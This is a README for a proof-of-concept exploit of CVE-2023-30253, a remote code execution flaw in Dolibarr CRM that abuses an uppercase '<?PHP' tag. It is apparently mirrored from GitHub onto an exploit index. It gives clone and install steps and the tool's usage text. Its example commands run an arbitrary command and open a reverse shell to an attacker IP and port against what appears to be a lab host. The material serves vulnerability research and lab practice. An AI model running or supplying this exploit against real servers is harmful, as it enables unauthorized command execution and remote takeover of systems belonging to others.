Share
## https://sploitus.com/exploit?id=C3EFEA8E-6527-5B6B-BE79-E6F09F6DBCEE
# CVE-2023-30253

<p align="center">
  <img src="https://github.com/Rubikcuv5/cve-2023-30253/assets/47946047/eee891a5-2641-48c5-95bf-1b0e42ded1ac" alt="image">
</p>

# Description
 Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.



## Documentation

- [CVE-2023-30253](https://cvefeed.io/vuln/detail/CVE-2023-30253)
- [GitHub Advisory: GHSA-9wqr-5jp4-mjmh](https://github.com/advisories/GHSA-9wqr-5jp4-mjmh)

## Setup
```
git clone https://github.com/Rubikcuv5/cve-2023-30253.git

pip3 install -r requirements.txt

python3 CVE-2023-30253.py -h
```

## USAGE
```
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)

Argument parser

options:
  -h, --help            show this help message and exit
  --url URL             URL of the website
  -u USER, --user USER  Username
  -p PASSWORD, --password PASSWORD
                        Password
  -c COMMAND, --command COMMAND
                        Command to execute
  -r ip port, --reverseshell ip port
                        Reverse shell IP and port

```
## EXAMPLES POC

### Execute a command 
```
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"
```

<p align="center">
  <img src="https://github.com/Rubikcuv5/cve-2023-30253/assets/47946047/25befa10-d52b-4f39-83cc-1398c7bb205e" alt="image">
</p>

### Getting a reverse shell
```
 python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r  10.10.14.17  4444
```
<p align="center">
  <img src="https://github.com/Rubikcuv5/cve-2023-30253/assets/47946047/56473ae8-901f-4eb3-ad8f-7794970c19ce" alt="image">
</p>


## Author

- [Rubickcuv](https://github.com/Rubikcuv5)